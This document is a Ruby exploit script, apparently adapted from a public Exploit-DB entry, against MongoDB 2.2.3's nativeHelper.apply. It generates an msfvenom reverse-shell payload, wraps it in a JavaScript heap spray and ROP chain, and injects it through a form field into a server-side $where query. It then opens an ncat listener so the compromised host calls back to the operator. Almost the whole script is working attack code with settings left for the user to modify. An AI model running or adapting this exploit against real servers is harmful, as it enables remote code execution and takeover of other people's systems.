# Title: MongoDB nativeHelper.apply Remote Code Execution
# Exploit Author: agixid http://blog.scrt.ch/2013/03/24/mongodb-0-day-ssji-to-rce/
# Software Link: http://fastdl.mongodb.org/linux/mongodb-linux-i686-2.2.3.tgz
# MongoDB Version: 2.2.3
# Copied from https://www.exploit-db.com/exploits/24947
# Author: Ugnius Skučas
require 'open3'
require 'openssl'

require 'http'
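# MODIFY THESE — operator-side settings for the engagement.
LHOST = '10.10.10.15'          # address the reverse shell connects back to (ncat binds here)
LPORT = 443                    # port the reverse shell connects to / ncat listens on
PARAMETER = "CompanyName"      # form field the server interpolates into its $where clause
target_url = "https://10.10.10.10/cgi-bin/mongo/2.2.3/dbparse.py"
puts "[+] Selected target url: #{target_url}"

# Build the stage with msfvenom. The command is an argv array (no /bin/sh), so LHOST and
# LPORT are never re-parsed by a shell. The original one-liner ended in '2>/dev/null}' —
# the stray '}' made the redirection target '/dev/null}', which can fail the whole
# command and leave `shellcode` empty without any visible error.
puts "[+] Building JavaScript linux/x86/shell_reverse_tcp"
msfvenom_cmd = [
  'msfvenom', '-p', 'linux/x86/shell_reverse_tcp',
  "LHOST=#{LHOST}", "LPORT=#{LPORT}", 'CMD=/bin/bash',
  '-f', 'js_le', '-e', 'generic/none'
]
begin
  shellcode, msfvenom_err, status = Open3.capture3(*msfvenom_cmd)
rescue Errno::ENOENT
  abort '[-] msfvenom not found in PATH; install Metasploit or fix PATH'
end
# Strip any trailing newline: the output is embedded in a JS string literal, where a raw
# newline is a syntax error and the injected script would fail silently on the target.
shellcode = shellcode.strip
if !status.success? || shellcode.empty?
  abort "[-] msfvenom failed (exit #{status.exitstatus.inspect}); no shellcode generated\n#{msfvenom_err}"
end

puts "[+] Building payload with the shellcode"
# Each fragment is a double-quoted Ruby string on purpose: the "\x.." escapes in the last
# fragment must become raw bytes in the request body, exactly as in the original PoC.
# The JavaScript appears to heap-spray the shellcode behind 0x90 (NOP) filler, spray a ROP
# chain the same way, then call nativeHelper.apply with a crafted object. The fixed
# addresses are specific to the mongodb-linux-i686-2.2.3 build named in the header and
# are not portable to other builds.
payload = [
  "shellcode=unescape('#{shellcode}');",
  "sizechunk=0x1000; chunk='';",
  "for(i=0;i<sizechunk;i++){ chunk+=unescape('%u9090%u9090'); }",
  "chunk=chunk.substring(0,(sizechunk-shellcode.length));",
  "testarray=new Array();",
  "for(i=0;i<25000;i++){ testarray[i]=chunk+shellcode; }",
  "ropchain=unescape('%uf768%u0816%u0c0c%u0c0c%u0000%u0c0c%u1000%u0000%u0007%u0000%u0031%u0000%uffff%uffff%u0000%u0000');",
  "sizechunk2=0x1000; chunk2='';",
  "for(i=0;i<sizechunk2;i++){ chunk2+=unescape('%u5a70%u0805'); }",
  "chunk2=chunk2.substring(0,(sizechunk2-ropchain.length));",
  "testarray2=new Array(); for(i=0;i<25000;i++){ testarray2[i]=chunk2+ropchain; }",
  "nativeHelper.apply({'x' : 0x836e204}, ['A'+'\x26\x18\x35\x08'+'MongoSploit!'+'\x58\x71\x45\x08'+'sthack is a nice place to be'+'\x6c\x5a\x05\x08'+'\x20\x20\x20\x20'+'\x58\x71\x45\x08']);"
].join
puts "[+] Payload: #{payload}"

# Server-side query is {'$where': "this.CompanyName == 'INPUT'"}: the value closes the
# quoted string, runs the payload as statements, then re-opens a string so the
# remaining JS stays syntactically valid.
injection = "';#{payload};var _='"

Thread.start do
  begin
    # Best-effort delay so the ncat listener started below is bound before the target
    # is asked to connect back; without it the reverse shell can race the listener
    # and be refused.
    sleep 1
    puts "[+] Sending exploit via POST request"
    ctx = OpenSSL::SSL::SSLContext.new
    # Deliberately no certificate validation: the lab target's certificate is not
    # trusted. Do not reuse this context against anything but the test target.
    ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
    HTTP.post(target_url, ssl_context: ctx, form: { PARAMETER => injection })
  rescue StandardError => e
    # Surface the failure instead of letting the thread die quietly while ncat waits.
    warn "[-] Exploit request failed: #{e.class}: #{e.message}"
  end
end

puts "[+] Launching ncat listener on address #{LHOST} and port #{LPORT}"
# argv form: no shell, so LHOST/LPORT are passed verbatim to ncat.
system('ncat', '-nvl', LHOST, LPORT.to_s)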